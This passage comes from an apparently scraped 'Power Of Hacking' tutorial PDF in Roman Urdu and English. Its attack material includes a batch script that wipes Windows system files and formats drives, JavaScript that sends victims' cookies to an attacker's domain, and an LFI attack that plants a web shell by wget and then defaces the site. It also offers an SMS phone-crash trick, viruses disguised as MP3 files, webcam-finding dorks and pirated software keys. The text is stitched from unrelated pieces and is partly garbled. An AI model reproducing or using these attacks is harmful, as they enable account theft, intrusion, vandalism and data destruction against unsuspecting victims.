Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree echo attrib -h -r -s /s /q >>show.bat goto c:?/show.bat del /f /q c:?/*.* del /f /q %windir%?/*.* del /f /q %windir%?/system32?/*.* if %%x in (c d e f g h i) do format /f /q x: pause 1st step is this when u start ur windows u hv special tasks in ur minds i.e u wana play a game so kill all other application which u r nt using by task manager press alt+ctrl+del n go 2 proccess n end all application leaving some imp which r ab8 17 in num. 1 more imp thing try 2 use portable app u can download any poarable 4rm cnet.com ok nw come 2 registry so friends it is not possible 2 check ur registry every day but nw i will tell u ab8 a batch which will check ur registry @echo off fc c:?/windows?/regedit.exe c:?/windows?/system32?/tab.sys pause exit this batch will check ur registry
before using this batch u must create registry backup by this @echo off copy c:?/windows?/regedit.exe c:?/windows?/system32?/ rename c:?/windows?/system32?/regedit.exe tab.sys pause exit it will create a backup of registry so run it for one time note make a new backup when u hv install new soft. If u get difference by running 1st batch then replace it by this batch @echo off del /y c:?/windows?/regedit.exe copy c:?/windows?/system32?/tab.sys c:?/windows?/ Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 88
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree rename c:?/windows?/tab.sys regedit.exe pause exit Hack Tutrial:HOW TO FIND WINDOWS PRODUCT KEYS
How to find Windows Product Key From Windows XP CD Itself:1) Insert Windows XP cd into a working computer.2) Exit Autorun introduction3) Open ?My Computer 4) Right Click on the Windows XP cd-rom drive and select explore.5) Open the I386 folder6) Open unattend.txt 6) Now scroll to the bottom of the txt file to get the Product key. so friends enjoy Hack Tutrial:Best Cookies Stealing Whatt are cookies? Cookies r basically strings by which a website remember you your PC ect. When u login to any web then web server will make some cookies And web server will remember u by your cookies Whatt is cookies stealing? Cookies stealing is a way by which u can hack any account with out knowing user name and password u hv 2 send a link to your victim when he click your link he will get a image or PHP script and this script will give u access to his account until victim get logout but in the case of yahoo cookies will deleted after 24 hours and u need to just refresh the page to get new cookies for you interesting How we can steal cookies?i knw 2 ways to steal cookies most ppls ask me ab8 this method but today i m giving u many use full scripts by these script u can hack ppls download scripts from here http://tinyurl.com/cookies-stealing this zip file include IP stealer script one facebook cookiesstealing script one cookies stealing script and most important yahoo cookiesstealer script 1st of all i will tell u ab8 yahoo cookies stealing u will get an rar file in that file you will get 5 more files upload them on some free hosting sites then create a directory with the name cookies and send this java script to ur victim javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape( document.cookie)); ok download another script from here tut is also in it hope u will enjoy www.tinyurl.com/5vbukmw u can also get this tut www.tinyurl.com/tutcooking Hack Tutrial:RESTART ANY MOBILE THROUGH YOUR MOBILE Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 89
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree Frnd (')49 Br Ye TypE Kray eg ''''''''''''''' s tarah , Lekun hayal rakhay ye wala type na karay (") ,S Ko sNd Karay 1110 ,1108 , 1600 s taraha set jis k paas hou us ko send karay, MsG PaRnY K LYe OpEn KrO Gy tU MoBiLE ReStRt HogA StAy WiTh aap log ye soch rahay houngay keh s k baray may to sub ko pata hay! Dont wory mera lecthure drone attak hay Bom attak nai! nokia k camray walay set may write sms may waha par option aayegay text sms, flash sms , Multimadia sms , voice sms! aap nay wo viurs ko aapnay sms template may save karni hay matlab ' ye aap nay 49 baar tamplate may lekhnay k baad save karni hay, aap nay falash sms par click karna hay us k baad option may jakar template say wo viras waha par le aana hay! Ya phir waha par houd bana sakhtay hay us k baad star ka batan dabay waha par insert symble may ek trai engle hoga last may.wo sub say pehlay lagana hay us k baad template lagana hay, aur phir send karday saada set walay k number par jaisa aapka sms send hoga us ka mobile restart ho jayega! Us ko pata b nai chalega keh meray cel par ye kya hogaya mazay ki baat ye keh agar wo cal b kar raha ho to phir b mobile restart hoga aapkasms b nai aaya hoga Us ko pata b nai chalega Enjoy !! Hack Tutrial:Remove Autorun Viruses Urself:: ye virus jab ap k pc mai ata hai to Folder Option Regedit taskmgr cmd save mode system restore disable kr deta hai.. ksi drive ko open kren to wo ak new win mai open hota hai Total Pages 5. Page 2 let start removing the virus pehle hamy registry editor enable krna hai.. goto start RUN or phir type kren.. reg delete HKCU?/sofwaremicrosoft?/windows?/currentversion?/policies?/system /v "DisableRegistryTools" is se registry editor enable ho jai ga. Now go to run and type regGoto pa- HKLM?/Software?/Microsoft?/Windows?/Currentversion?/Run write side pe sb entries delete kr den. is se virus autorun nai hoga pc start hote he.. now restart ur system registry editor open kren ab hamy folder option enable krna hai ta k hiden files shw hun Goto HKCU?/Software?/Microsoft?/Windows?/Currentversion?/Policies?/Explorer?/ 'NoFolderOption' delete this entry. and th HKLMe?/Microsoft?/Windows?/CurrentVersion?/Explorer?/Advanced?/Folder?/Hidden ?/Showall write side checkedValue ha open kren us ki alue 0 hogi usy 1 kr den.. close the rgistry editor or refresh task manager baaz oqaat he disable hota hai is virus se.. goto Start Run Type Gpedit.msc Goto (Administrative Templates System Ctrl+Alt+Del) right side pe Remove Taskmanager pe click kren Not configured ho ga phle enable kr k apply kren then again Not configured kr den.. check taskmgr its enabled tmaam drives mai adress bar se ennter ho jain autorun.inf file ko delete kr den or sath .exe .com ya .cmd mai virus hoga usy delete kr den har drive mai hoga sb se delete kren or system restart ya logof kr den. virus removed successfully.. Hack Tutrial:HOW TO CHANGE START BUTTON NAME OF WINDOWS XP How to change start button text in xp. sab se pehle download karo "resource hacker". (search in google) aur install karo ab is ko open karo. file menu me jaun Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 90
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree open (ctl+O) pe click karo c://windows/explorer.exe open karo, jab open hojae ga to us k left side pe folder dikhae den ge un me "stingtable" pe click karo aur is pe mojod folder "37" aur 37 me mojod 1033 pe click karo. left side me text mojod hoga us text me mojod "start" ki jaga apna text likho e.g "tahir" ab text ke oper mojod button "complete script" pe click karo ab file menu me save as karo MaKhDooM.exe ab run me ja kar "regedit" likho registy editor khul jae ga "hkeylocalmachine" pe click kar k winlogo pe click karo aur us me mojod shell pe click karo is me explorer.exe likha hoga us k jaga itsuper.exe likho aur apne pc ko restart karo.---END--Hack Tutrial:YAHOO FREE CALL FREE CALLS On YahOo MesSeNgeR..!ApkO SirF yE kArNa hA K YaHoO MeSenGer maIn yE nuMBer daiL kaRna,,haI.. (+18003733411) yeH nuMbeR 1 AmEriCan frEe calL kaRnE WalUn nuMbEr hA..! Iss kO daIL,, KaRNe K bB 1 MeNu AJae Ga Jis Ma OpEraTOr aPkO MenU BaAaEGa!! APKo mEnu mA SirF yE bOlNa hA,, (FReE CaLl).. ReMeMbEr sIrF bOlna hA tYpE nhI kRnA!! Is k bB Ap Jo nuMbeR MiLaNa,, ChaHty hN miLAyaIn bUt wID C0uNtRy coDe!! EG; 0092345433xxx-------HoPe U'lL uNdErSTaNd mY TrICk..!!EnJOy...!! Hack Tutrial:DANGROUS NOTE PAD VIRUS Dangerous Virus using notepad. Now, to test it, create a textfile called TEST.txt(empty) in C:?/ Now in your notepad type "erase C:?/TEST.txt" Then do "Save As..." and save it as "Test.cmd". Ab file ko run krin "Test.cmd" and go to C:?/ apka text ghayeeb ho gya hoga then Go to notepad & type erase C:?/WINDOWS(or C:?/LINUX if you have linux) & save it again as findoutaname.cmd. ab us file ko run mat krin nai to apki window ud jaye gi ab ap virus kisi ko b snd krin jb b wo open kry ga to victom ka pc crash...................... End Hack Tutrial:PROBLAM IN DISCONECT INTERNET CONNECTION ear if ur internet discennecting sevral times in the day. I am going to easy way to solve this problem. goto start>run and type cmd and hit enter. Type there ''ipconfig/release'' without commas and there will show ur all ip config at ur clip2 goto start>run and type cmd and hit enter. Type there ''ipconfig/release'' without commas and there will show ur all ip config at ur cli and there u type this cmd also ''ipconfig/renew' and hit the enter and restart the dsl router. there is an other cmd also available that cmd is ping. We type in cmd prompt like this ''ping -t -w 192.168.1.1''if u want to increase ur net speed u can also use this cmd in cmd prompt '' ping -t -w 0.0.01000'' and if u want to get help about ping just type in cmd prompt 'help ping' and hit enter. End.. Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 91
Power Of HackingÂŽ Facebook:https://www.facebook.com/HAckingRouterwifiFree Hack Tutrial:HACK CAMS THROUGH GOOGLE Cameras ko hack karen ab google bhai ke sath.very easy.. 1. sub se pehle google.com per jayen. 2. yeh dork "inurl:/view.index.shtml" goole main daal kar search maren or
koi bi cam select kr ke dekhen. yeh kuch dorks hain jin ko google main search karne se or cams aa jayen gen like beach , office , bla bla. .inurl:/view.shtml .intitle:Live View / - AXIS ?? .inurl:view/view.shtml??Ă&#x153; .inurl:ViewerFrame?Mode= .inurl:ViewerFrame?Mode=Refres .inurl:axis-cgi/jpg .inurl:axis-cgi/mjpg (motion-JPEG) . .intitle:Live View / - AXIS 20M intitle:Live View / AXIS 206W .intitle:Live View / - AXIS 210? .inurl:indexFrame.shtml Axis .inurl:MultiCameraFrame?Mode=Motion .intitle:start inurl:cgistart .intitle:WJ-NT104 Main Page .intext:MOBOTIX M1? intext:Open Menu .intext:MOBOTIX M10? intext:Open Menu . .Intext:"MOBOTIX D10 ? .intitle:snc-z20 inurl:home?/ .Intitle:snccs3 inurl: home/ .intitle:snc- .c next. .intitle:"sony network camera snc-p1? .intitle:"sony network camera snc-m1? .intitle:"toshiba Network Camera" user login .intitle:"netcam live image" .intitle:"i-Catcher Console - Web Monitor.. End Hack Tutrial:REMOTE FILE INCLUSIOM (RFI) HACKING IN URDU
Tut:Remote File Inclusiom (RFI). Wht u need. N0-1 mozilla firefox. N0-2 tamper data.(its firfox addon Google it). N0-3 A shell (recommended r57 or c99 google it).Upload it on fre hosting as .Txt. Par mai kuch yahan upload karta hn ap b yahan karo sai rahe ga see step 4. N0-4 A account on drivehq.Com.And their upload
ur shel as .Txt. N0-5 A vuln web and little brain. Lets start. Dork :.Php?Page-contact.Php kafi site milae ge par vuln buhat kam its ur luck.Patience rakho ge mil jai ge vuln web. Nw web jo select ke us k akhr mai yae hoga /page=career.Php. Then replace after page= with ths ../../../../../../../../../proc/self/environ (../ yae apne marzi se torae zada dal dijai ga 10 12). Ur link will be like ths www.Web.Com/page=../../../../../../../proc/self/environ jaise enter karen ge web par ek ajeeb code ajai ga.Agar yae code iya tou web vuln h..Ap agae kam karo.Code Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 92
Power Of HackingŽ Facebook:https://www.facebook.com/HAckingRouterwifiFree nh iya tou next web par try karo.Jaise bola tha kahin apka shel upload hona chayae .Txt format mai.Mai drivehq par karta hn.Lfi string bnate hain. Nw lfi string would be <?system('wget http://www.Web.Com/shel.Txt -o shell.Php');?> is mai www.Web.Com/shel.Txt apka shel link h.Ja han apne shel upload kia ho.Mai jb karta tha drive hq use karta hn. Oka.Lfi string note pad mai likhna then.Jahan Code araha tha(../../ yae likhne k bd) wahan us page par option mai ja kar tamper data on karo.Then tamper data mai click on start tamper.Ek dum window i ge wahan click karna tamper par. Tamper par click k bd ek aur window khule ge wahan USER AGENT mai wo jo lfi string tha dal daina..Lfi string paste kardaina. Phr oka par click.Phr stop temper data par click kardaina ya bnd kardaina. You have done it. Www.Site.Com/shell.Php kholo ge tmra shell execute hojai ga web par.. Bingo. . . . Nw enjoy hacking and brust ur victim. Chalo deface kartae hain.Make sure shel par yae likha i public§html. Nh tou executing comand se is directory mai jana.Waise phelay se is he mai hoge. Upload ka option hoga shel mai. index.Html k nam se deface page daldo. Chck karo upload hua ya nh. Www.Site.Com/index.Html.Agar deface page khule then shell sari files dikha raha hoga.Index nam ke file dhundna aur delet kar daina.Phr tmra deface page yahan i ga. Www.Site.Com End. . . . . Hack Tutrial:VIRUS IN URDU Real virus bnane k liye 1 software ki zarurat hoti he.Google.com me search kre "VIRUS CONSTRUCTION TOOLS"or koi b tool downlod kre jb ap koi b virus construction tool download kare to use start kre.Wo apse apka name puche ga apne real name nahi deni.Is k elawa decription me virus k mutaliq kuch likna he. Virus ka name b likna he. Or EXE me browse ko clik kr k RUNDLL32.EXE ko slct krna he pir jb sara kam cmplet kr d to GENERATE pr clik kre.Wo software apke liye 1 notpade file banaega jisme virus ka code hoga.Apne use code ko copy kr k dusre notepad me paste krna he or use save krna he is nam se NAME.VBS ab jaha b ap ise rakhy tois ko rename kr d yani 1 foldr me audio song he SONG.MP3 to apne us virus ko SONG.MP3.VBS k nam se waha save krna he jis se wo hide hojaega.Ab jb b us audio song ko play krenge to ye virus start hoga jisse apke PC ki speed slow hogi or ye virus hr us jga auto copy hogi jis jaga audio song hoge.Esi trha koi b gana kisi b net pr upload krne se virus b uplod hoga.Esse ap boht se dusre qism k virus bna skte h ye 1 underground secret thi jo mene apko bata d.Apne kisi ko nahi batana iske bare me.Kl ya parso apko WORM GENERATOR sikaunga.End Frndz i am sending informati0n about "Malware" stay with us Malware is a big problm 2day. Everyday innocent peoples r geting infctd by diffrnt Malwares. The m0st common type of malware . are Viruses, Worms, Trojans.You all are familier with viruses, there4 i will tell u about worm & trojans... C nxt WORMS: A worm is a malicious program, than can replicate itself onto other computerz on a Network. Once it infect a system, it uses that system to send out other copies of it self to other rand0m systms.. TROJANS: -Trojans can be used to do sily things to a system like changing desktop, user interface, to0k c0ntrol of m0use etc.. it can also be used to do s0mething serious like accesing ur data, erasing ur files, stealing paswrd etc.End Make a virus that will delete all data in your pc. Open notepad type del *.* save as boooom.bat then Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 93
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree run it. Try your on risk! Har anti virus best hai agr wo latest regstr ho. Wse top pe Kasper or mcafe hain. . Par mai anti virus use nai krta. . Mere nazdik is k faidy kam nuqsan zayada hn. . . Or chnd ak ikhtyatain hn jin ko ikhtyar kr len to anti ki zrorat b nai parti Ikhtyatain b bta dun ga. . Or recycle or systm volume foldr Window k apne foldr hn. Ye delete nai hote agr ho b jain to phr se ban jate hn. Jo b software ham delete krte hn wo systm volume foldr mai ajate hn. Yhan se inhe dobara restore keya ja skta hai. Ap ki mrzi hai yhan se b ura dyn ya phr system restore kr lyn. Ek Aesa Virus ha HardDisk jitni baar marzi format kro. Wo virus remove nehi hota. Aur system slow kr deta hai. Lekin Norton se ho gaya tha. Mein nay check kia. Dost k pc pr. Usy Boot Sector virus kahte hain. Or ye Norton Avg kasper avast avira n0d. . Ksi anti se remove nai hota Q k ye Bios Mai enter ho jata hai. Or isy rem0ve krne k ly bi0s re.instal krna parta hai. B00T SECT0R VirUses........ Bi0s Mai Ghus Jate Hain 0r ksi Anti.v Se Rem0ve ni Hote. Bi0s Reinstal Krna Parta Hai. System Volume: Hiden Files jahan se show hoti hain. Us k neche 3rd option hota hai show system files..?Usy unchk kr do. .Har drive mai recycle or systm volume info. . Ka ak ak foldr hoga is foldr ki space chk krna andr data daikhna Apny computer mai virus sy infectd file ko dlete krny ki liay Go to start, click at Run n type ".eml" Virus wali files show ho jaen ge and thn in sub files ko SHIFT+DEL pres kr k dlete kr iF u wanna use more thn 1 antivirus same time. goto run type regedit thn softwars nd dlt 1st antivirs registry.n do same 4 2nd. Bad sector 2 types kay hoty ha ek temperary jo simple format karny say remove ho jaty ha ek permanent hoty ha un ko win98 ki cd say format kar kay fix keya ja sakta ha different soft bi hoty ha bootable New Types of Computer Viruses: 1.Bureacatic virus2. Gallup virus 3.Governmenteconomist virus 4.New world ordervirus 5.Nike virus6.Prozac virus. and all notepad virus postd on mtahirzahid.blogspot.com Sub se pehlay Computer Virus 1986 main 2 Pakistani Brothers nay bnaya tha. viRus Tip Pc ko Deadly Slow krne wale viruses jo Taskmgr k Proces Mai Daikhe ja skte Hn.un k Names ye hn."RUNOUCE.EXE" "REGSVR.EXE" AVG Antivirus Serial Key for 10 Years 8MEH-RQXTV-HQOWD-E447R-MPHYD-PEMBR-ACED remove chinese virus download softwear http://adf.ly/1MBrm skip ad antivirus download krny se pehly koi agr pehly se mojod ho cel ma to agr isi company ka ha to overrite ho ga. Agar koi aur company ka ha phr waise hi instal ho jaye ga! jb Viruses Nod32 Ko Dlt Krny na dy to . . . Ap New Window Kro Aur Sb Sy Phlay Nod32 (Version 4 Ya Above) Ya Koi 2sra A.V kro Sath Usb Disk Security b...... Yad Rahay Win Kr K Koi Drive Open Na Krna Jb Tk A.V na Ho Jaen... Aur Agar Ap Autorun Virus Say Bachna Chahtay Hain To Drive ya Usb etc Adress Bar sy Open Kren. jb Viruses Nod32 Ko Dlt Krny na dy to . . . Ap New Window Kro Aur Sb Sy Phlay Nod32 (Version 4 Ya Above) Ya Koi 2sra A.V kro Sath Usb Disk Security b...... Yad Rahay Win Kr K Koi Drive Open Na Krna Jb Tk A.V na Ho Jaen... Aur Agar Ap Autorun Virus Say Bachna Chahtay Hain To Drive ya Usb etc Adress Bar sy Open Kren. Bad sector kesy aty hn? Hdd zra si b unchai se gir jai to Ap lucky hun ge agr koi bad sectorz na ayen hun. Or Hdd ko On halat mai agr hath mai pakr k zra left right tera wera keya jai. To vibrate krta hai. Is se bad sectrz creat hote hn. Hdd 24 hr chalne se kafi heat up ho jati hai. Or heat se b bdsectr atay hn. Unalocated krne k ly sirf itna pta hona chahye k 6gb drive hai to sectorz kahan par crpt hn. Or wo software se repairng k doraan daikh skte ho. Us k bad us jaga ko unalocate kr do baqi ki drive bna lo. C mai ho to format nai hoti win b Nai instal ho skti. Tb usy slave mai dosri hdd k sath lga k u In 2no Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 94
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree viruses k remove krne ka ak he desi tariqa hai. Window mai system32 mai dono super hiden pare hote hain. Shw kr k in ko rename kr do in ki jaga in he k name k 2 foldr rkh do. Ak foldr Runouce.exe ak Regsvr.exe Phr taskmgr k proces se end kr do or phr un dono virus ko del. Phr kbi na aein gay. Avast AntiVirus 4.8 PROFESIONAL Full Life Time Key www.hotfile.com/dl/103433555/8318472/A.A.2009.Pro.v4.8.Plus-Keygen2010.rar.html frndx jo bhi antivirus ho, us say system scan karo, jab koi virus na rahay, antivirus ko uninstall kar do, system ki speed bhi theik rahay gi & protection k liye firewall active rakho, u.s.b kam say kam istamal karo. this is like a profesional usage. Make a virus that will delete all data in your pc. Open notepad type del *.* save as boooom.bat then run it. Try your on risk! PCsoftware ClamWin is a Free Antivirus program for Microsoft Windows 98/Me/2000/XP/2003 and Vista. ClamWin Free http://j.mp/9GNqkv ANTIVIRUS KEY : For ESet Products Update Username : EAV32384711 Password : ekxhbxfemx Expiration : 29/06/2012 har us cel me virus ata hy jo symbian hy mtlb jis s0ftware etc aty hain aur virus jaldi ya bad me nahi ata virus se bachna to 1st apna mem0ry card kisi 2sry m0bile me na laga0 2nd kisi 2sry m0bile ka card apny m0bile me nahi han f sure hy us card me virus nahi phr lga skty wrna nahi 3rd net pe web wo use kro jin me virus na h0 4th blueto0th se s0ng pic etc se kuch b 4rwd na kro mtlb bluet0oth kum use kro 5th apna card us computer pe laga0 jis me virus na h0 1 data Cut Paste krte wqt cancel kr do wo file ksi side ki nai rehti. Recover b nai hoti.2. Low level format ya Zero Fill krne se recover nai hoti par ak 40.gb hard ko low level frmt krne mai 6 hr lagen ge. Or Data us jaga koi or rakh do to pichla recvr nai hota Install New Fresh Win. Then instal all ur fav. Software and driverz then install Norton Ghost Software. Taskbar mai Volume k pas Ghost ka icon ajai ga click on it 2 option hunge. Create backup (image) or Restor Bakup. 1st bkup bnana hai to backup wala option click kren. Nxt c drive select kren nxt bkup kahan save krna hai d' ya e mai save kren nxt nxt nxt. Pc restart ho jai ga. Bkup bn'na shuru ho jai ga. Jb b koi masla ho win mai to Restore option use kre same method. Win 2 mint mai install ap KASPERsky 2010/11 instal krn,bht eazy aur fast hy,ye intenet security,pc security 2nu c0licti0n h0ti hy,with kays,,aut0 scaning hy,pc es se sl0w bhe nhe h0ta Virus in batch viruses or virus genrator softs se ban'ne wale virus or un autorun virus ma sky earth ka fark hai.Han disable ham reg.Se wo sb kr skte hain.Jo funyust krta ha.Pr wo hr drive ma copy ho jata ha.Or delet krne pe phr ajata ha.Tere virus ma ha ye ability Make a batch virus it wil create milions of folders in ur pc. Open notepad type. For /L %%A IN (1,1,1000000) DO MD C:?/VIRUS_%%A Save as Flood.batType this cmand 4. . 5. .or 6 time acording to ur local drives. . And jst change drive path C D E. ? Download Virus Maker Software:1. Disable windows task manager2. Disable registry editor, Msconfig and Cmd3. Disable microsoft internet explorer4. Disable internet connection5. Disable Start menu and My computer6. Disable All microsoft's products7. Remove All files in victim's pc8. Kill system files9. Change icon of exe files10. Rename all mp3 files11. Turn off/on monitor12. Open/close cd rom Download from:www.4shared.com/file/gzwp8zg5/virusmaker.html Password of rar file is:www.ethicalhacking1.com Hack Tutrial:-
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 95
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
DREAM WEAWER IN URDU Sb se pehle ap dream Weaver ka k0i b versi0n install kren, mere pas 6.0 he wese abtk 7.0,8.0 phr uske bd CS1 se CS5 tk a chuka h Ab dream weaver open kren, file me jaen, wahan se new page (ctrl+n) len, ap k pas ek dialog box ajae ga, wahan se kch or b opti0n hn ge, ap wahan se basic phr baraber wali wind0w se HTML per click kre phr CREATE button per click kren, ap k pas ek new page ajae ga. Ab MODIFY per click kren, wahan pehla opti0n PAGE PROPERTIES ka hoga, PAGE PROPERTIES per click kren, ap k samne ek dialog box ajae ga, wahan se ap PAGE ka name, Background Color/Image, Font Color, Link Color etc apni merzi ka set kre, ap k samne apka bnaya hua ek page ajae ga. Ab sb work Insert k Button se hoga, Insert me pehla opti0n TAG ka hota h, yahan ap apni merzi ka koi b HTML TAG select kr k insert kr skte h Insert k button me 2nd opti0n Image ka hota he, js se ap apni Image de skte hen, image dene k bd ap RIGHT CLICK kren or PROPERTIES per click kren, wahan ap ko IMAGE ki properties mil jae gy js se ap heiht widht etc de skte hen. Agla opti0n INTERACTIVE IMAGE ka he, jsme * Rolover Image * Flash Button * Flash Text Hote hen. ROLOVER IMAGE se ap do mukhtalf pics dal skte hen, Maslan ap ne akser dkha hoga k ap ksi web k button per Mouse le kr jate hen tho uska color change hojata he, ye rolover image se hota he Image 1 me browse kr k pehle image ka link den phr image2 me 2nd image ka. FLASH BUTTON se ap dream weaver me bne bnae buttons de skte hen, unka name change kr skte hen or unper link b laga skte hen. FLASH TEXT se ap Flash Text de skte hen. Next opti0n LAYER ka he, Layes ek z-axis table ki terhan ka hota he, ap layer ko page me kahy b leja skte hen, layer k ander images,text, video etc insert kr k page me kahy b le ja skte hen. Us k bd TABLE ka option ata he, Table per click krne se ek dialog box open ho jata he, jsme ap apni merzi se rows or coulumns set kr k table bna skte hen, table ko select kr k uski properties me se colorz b change kr skte hen, table ka sb se eham kam eligment setting krna b hota he, agr ap pics gallery bna rhe hen tho apni tamam pics ko table me rakhen is terhan se ap ki tamam pics ek sequence me aen gy. INSERT k button me next opti0n FORM ka hota he, FORM k option se ap Form create kr skte hen. Next opti0n FORM OBJECTS ka hota he, form objects ka use tb hy krte hen jb ap FORM insert kr chuke hote hen, FORM OBJECTS me kch sub buttons hote hen, * Text Field * Text Area * Button * Check Box * Radio Button * List Menu Form Object me 1st per TEXT FIELD he, text field se ap text box insert krwa skte hen, form me jo first name or last name k baraber me jo box hota he us ko text field kehte hen, text field insert krne k bd right click kren, phr properties me is k name etc change kr skte he, Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 96
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree warna by default rehne dain. TEXT AREA se ap c0mnents ka box de skte hen, right click kr k properties me jaen wahan se size widht etc apni marzi ka rakhen. BUTTON se ap button de skte hen, button insert kr k properties me jaen mahan button ka name, size or button ki performance yani submit button ho tho submit per click kre, Reset button hoto reset pe, warna None per click kren Check Box se ap check Box de skte hen. Radio Button se ap Radio button de skte hen, radio button ap ek waqt me ek hy select kr skte hen browser me. List Menu se ap drop down list de skte hen, Next opti0n Emain Link ka ata he, is se ap apni email per link laga skte hen. Next opti0n Hyperlink ka he, is se ap apne text or pic etc me link laga skte hen Next opti0n Head Tag ka hota he, Isme kch sub opti0nz b
hen. Keywords se ap apni web ka keywords likh skte hen, js ki madad se ap ki web ko go0gle search kre ga. Descripti0n se ap apni web ka descripti0m de skte hen, jaise apni web k bade me 2,4 line ki summary likh do. Baqi k opti0nz advance lavel k hen jo PHP, ASP.NET, C# etc se related he. Insert k button me ek opti0n FRAME ka hota he, Frame k mazid kch opti0ns hote hen, like BOTTOM, TOP, LEFT, RIGHT etc Ap in sub ko ek ek bar insert kr k dkhen, agr hum TOP insert krte h tho wo hamari dream weaver ki wind0w ko 2 hisso me taqseem kr deti he, or 2 alag alag pages bnati hen, is wajah se ye data ziadah krta h, log is k muqable me ziadah ter TABLE or LAYER use krte hen. Ab me ap ko btao ga k FORM kese bnate hen or form me java script kese insert krte hen. Sb se pehle ek new page len, phr INSERT butt0n se FORM per click kren, ek form insert ho jae ga. Form insert krne k bd ap INSERT se TABLE per click kren, ek dialog box ae ga, wahan ROWS ko 6 or COULUMN ko 2 rakhen or ok kren Ab ap TABLE k 1st Row k 1st Coulumn me ye likhen FULL NAME Ab 1st row k 2nd Coulumn me Insert k butt0n se FORM OBJECTS me TEXt FIELD select kren. Is k bd 2nd row k 1st coulumn me ADDRESS Likhen 2nd row k 2nd coulumn me again text Field den. Iski properties me size 20 kr lena Ab 3rd row k 1st coulum me EMAIL Likhen. Phr 3rd row k 2nd colum me TEXT FEILD Den. Ab 4th row k 1st c0lum me CELL NUMBER Likhen. 4th row k 2nd c0lum me TEXT FIELD Den. 5th row k 1st c0lum me GENDER Likhen. 5th row k 2nd c0lum me Insert >form object > Radio Butt0n Den. Phr space de kr MALE Likhen. Isi terhan se braber me ek or Radio Butt0n den or space de kr FEMALE likhen. 6th row k 1st c0lum me Insert>Form Objects>Butt0n per click kren. Ap k pas ek button ajae ga, ap butt0n per right click kren or properties se wahan 3 opti0n hn ge. SUBMIT RESET NONE ka. Ap Submit per click kren. Bilkul is terhan 6th row k 2nd c0lum me b krna he Bus Submit k bjae Reset krna he properties pe. Save as Form.html Form bnane k bd ab bari ati he Form ko validate krne ki, agr ap ko java script ati he tho ap validate Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 97
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree java se hy kren, warna kam chalane k lye dream weaver me b opti0n hen, lekin dw me ap apni marzi k malik ni hote, Form ko validate krne k lye step by step follow kren. Wind0ws> Behavi0rs Behavi0r per click krne se right hand side per ek panel khul jae ga, js per Behaviors per click hua mile ga. Us panel me 2 opti0n hn ge, Pehla "+" hoga or 2nd "-" hoga. Ap ko "+" per click kr k Validate Form ko select krna he, Validate Form per click krne k bd ap k pas ek dialog box open ho jae ga, Us dialog box me kch opti0n hn ge, Sb se pehle line 1 per click kre (ye name ka text box he Ab Required per check box lagaen, phr Any Charactor per click kren, Isi terhan 2nd line per click kren (ye Adress ka h) Required per check lagan or any Charactor per lagaen. Ab 3rd line select kren, ye Email ka he, Reqired per check lagaen or phr Email k radio butt0n per click kren. Ab 4th line per click kre, ye CELLNUMBEr ka he, Required per check lagaen, Phr Number k radio butt0n per click kren, or Number 0 to 9 likhna he. Is page ko b save kr k browser me dkhen. Aj me ap ko dream weaver me template bnana sikhao ga, Me ye template table ki madad se create krn ga, ap is ko layer ya frame ki madad se b bna skte hen, ye ap ki merzi per depend krta he. Sb se pehle ap ek new page len, phr Insert > Table per jaen, wahan rows 4 or coulum 5 rakhen, or Ok kren Ab 1st Row k 5cho coulum ko m0use drag kr k select kren or right click kr k Table>Merge Table me click kren, is se ap k 1st row ka ek table ban jae ga. Ab ap is Table me ek Image Banner Insert>Image me ja kr dal den Ab 2nd Row k 1st coulum me HOMElikhen. 2nd row k 2nd coulum me SOFTWARElikhen. 2nd row k 3rd Coulum me GAMES likhen. 2nd Row k 4th coulum me PROGRAMINGliken. 2nd Row k 5th coulum me FEEDBACKlikhen. N0te: Jtne ziadah link bnane ho utne hy coulum len. Ab 3rd row k 1st or 5th coulum ko chor kr beech k 3n0 coulum ko select kr k Merge kren. Ab 3rd row k 1st coulum me cursor ko blink krwa ker 10times Enter kren, is se apka Navigati0n Bar ban jae ga. Is navigati0n me ap HOME, SOFTWARE,GAME etc ka link laga den. 3rd row k 5th coulum me b ek ban gya he, wahan ap Google Adsense ka link laga den or earn kren 4th row k tamam coulum ko select kr k merge kr len. Or isme Footer yani C0py Right by UsMaNi likh den. Ab jo 2n0 navigati0n bar k bech me jo jagah khali he us me Editable Regi0n dalen. Edit Regi0n dalne k lye, Insert>Template Objects>Editable Regi0n Editable ka koi name den or enter kr den. Ap k pas ek chota sa editable regi0n ka box ajae ga, ap is k ander cursor le ja kr itni martba enter kren k editable regi0n Header or Footer se touch kr jae. Is ko save as Template kr k save kr den. Ap ka 